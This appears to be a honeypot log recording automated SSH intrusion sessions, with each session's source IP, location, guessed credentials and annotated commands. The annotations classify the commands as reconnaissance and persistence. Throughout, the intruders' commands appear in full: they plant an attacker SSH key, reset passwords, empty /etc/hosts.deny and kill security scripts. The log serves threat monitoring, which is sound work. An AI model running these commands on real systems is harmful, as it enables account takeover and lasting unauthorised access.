$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:y34KDcrHbIr0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_60 (118.193.33.228) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-23 23:14 EDT Β· as steam/1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\nplzptfzbetIv\nplzptfzbetIv"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nplzptfzbetIv\nplzptfzbetIv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_65 (46.174.212.145) β€” StrzyΕΌΓ³w, Poland Β· 1 session Β· 1 cmd
2026-05-23 23:12 EDT Β· as root/1!Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 crumpet_root_3 (172.94.9.31) β€” City of London, United Kingdom Β· 1 session Β· 1 cmd
2026-05-23 22:41 EDT Β· as root/Jimster@2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_73 (120.28.109.188) β€” San Juan, Philippines Β· 1 session Β· 19 cmds
2026-05-23 22:37 EDT Β· as root/redhat123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:fz3JhTYFGkJo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_4 (117.72.64.105) β€” Chaowai, China Β· 1 session Β· 20 cmds
2026-05-23 22:35 EDT Β· as deployer/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nRO7JKhZl8TpQ\nRO7JKhZl8TpQ"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nRO7JKhZl8TpQ\nRO7JKhZl8TpQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_21 (219.144.80.143) β€” Liuxiang, China Β· 1 session Β· 1 cmd
2026-05-23 22:28 EDT Β· as root/5nWt3P-fF4WosQm5O
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 chai_root_17 (4.213.160.153) β€” Pune, India Β· 1 session Β· 20 cmds
2026-05-23 22:05 EDT Β· as testuser/test12345
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test12345\nfvo9nXfpJubD\nfvo9nXfpJubD"|passwd|bash
$ Enter new UNIX password:
$ echo "test12345\nfvo9nXfpJubD\nfvo9nXfpJubD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_18 (210.13.84.84) β€” Shanghai, China Β· 1 session Β· 19 cmds
2026-05-23 21:45 EDT Β· as root/123456a.
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:tw3zro3vP3WH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_19 (125.77.73.145) β€” Fuzhou, China Β· 1 session Β· 1 cmd
2026-05-23 21:40 EDT Β· as swissmp/Swissmp@test
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 burger_root_15 (74.94.234.151) β€” Troy, United States Β· 2 sessions Β· 38 cmds
2026-05-18 08:22 EDT Β· as root/66666, root/adonix
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:5un7BNHwbtiH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:10tq4eF5xxEJ"|chpasswd|bash
🎭 liberty_root_24 (159.203.71.56) β€” Clifton, United States Β· 1 session Β· 19 cmds
2026-05-23 20:41 EDT Β· as root/66666
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ceqwr2J4JutU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 spice_root_10 (103.186.49.225) β€” Delhi, India Β· 1 session Β· 20 cmds
2026-05-23 20:40 EDT Β· as aziz/aziz
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "aziz\nizs1S1SzcAfU\nizs1S1SzcAfU"|passwd|bash
$ Enter new UNIX password:
$ echo "aziz\nizs1S1SzcAfU\nizs1S1SzcAfU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_36 (132.145.213.106) β€” Ashburn, United States Β· 1 session Β· 20 cmds
2026-05-23 20:35 EDT Β· as test2/testtest
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "testtest\n1DfmmHATX40t\n1DfmmHATX40t"|passwd|bash
$ Enter new UNIX password:
$ echo "testtest\n1DfmmHATX40t\n1DfmmHATX40t\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_65 (61.231.200.88) β€” Hualien City, Taiwan Β· 3 sessions Β· 55 cmds
2026-05-23 19:31 EDT Β· as ftpuser/ftpuser123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "ftpuser123\n8oyf52J0fVT2\n8oyf52J0fVT2"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "ftpuser123\n8oyf52J0fVT2\n8oyf52J0fVT2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ echo -e "ftpuser123\ndb3vnc4nywDu\ndb3vnc4nywDu"|passwd|bash
$ echo "ftpuser123\ndb3vnc4nywDu\ndb3vnc4nywDu\n"|passwd
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ftpuser123\nQKnHYp738scz\nQKnHYp738scz"|passwd|bash
$ echo "ftpuser123\nQKnHYp738scz\nQKnHYp738scz\n"|passwd
🎭 ghost_root_79 (114.141.59.195) β€” Jakarta, Indonesia Β· 1 session Β· 19 cmds
2026-05-23 20:18 EDT Β· as root/root1234@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:65VqRBLSwmJg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 toucan_root_6 (186.251.71.202) β€” Trindade, Brazil Β· 3 sessions Β· 60 cmds
2026-05-23 19:19 EDT Β· as interview/interview, jenkins/1234, ubuntu/ubuntu@1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "ubuntu@1234\nhXebPgke2cDA\nhXebPgke2cDA"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "ubuntu@1234\nhXebPgke2cDA\nhXebPgke2cDA\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "interview\nmCJ2Y4GnBvJs\nmCJ2Y4GnBvJs"|passwd|bash
$ echo "interview\nmCJ2Y4GnBvJs\nmCJ2Y4GnBvJs\n"|passwd
$ echo -e "1234\nDCnJV74fnCWc\nDCnJV74fnCWc"|passwd|bash
$ echo "1234\nDCnJV74fnCWc\nDCnJV74fnCWc\n"|passwd
🎭 shadow_root_59 (105.27.148.94) β€” Nairobi, Kenya Β· 3 sessions Β· 60 cmds
2026-05-23 19:18 EDT Β· as interview/interview, jenkins/1234, ubuntu/ubuntu@1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "ubuntu@1234\n7bBVatWDQOqV\n7bBVatWDQOqV"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "ubuntu@1234\n7bBVatWDQOqV\n7bBVatWDQOqV\n"|passwd
